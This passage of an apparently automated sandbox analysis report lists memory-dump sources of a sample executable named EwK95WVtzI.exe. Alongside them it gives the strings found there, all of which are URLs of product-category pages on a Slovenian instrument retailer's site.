00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/prenosn
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/program
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/radiaci
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/registr
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/tempera
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/
                Source: EwK95WVtzI.exe, 00000000.00000003.1998747633.0000000004980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-brezz
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-seti/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-vecka
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-vsi/
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/data-loggerji-za-ex
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/hladna-veriga-in-pr
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1956426978.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1462659382.0000000003FF0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1490978390.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/data-loggerji-spominske-enote/programska-oprema-z
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1966844231.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1429362906.0000000003ED0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1492885844.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1497175353.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1428404572.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1439475850.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 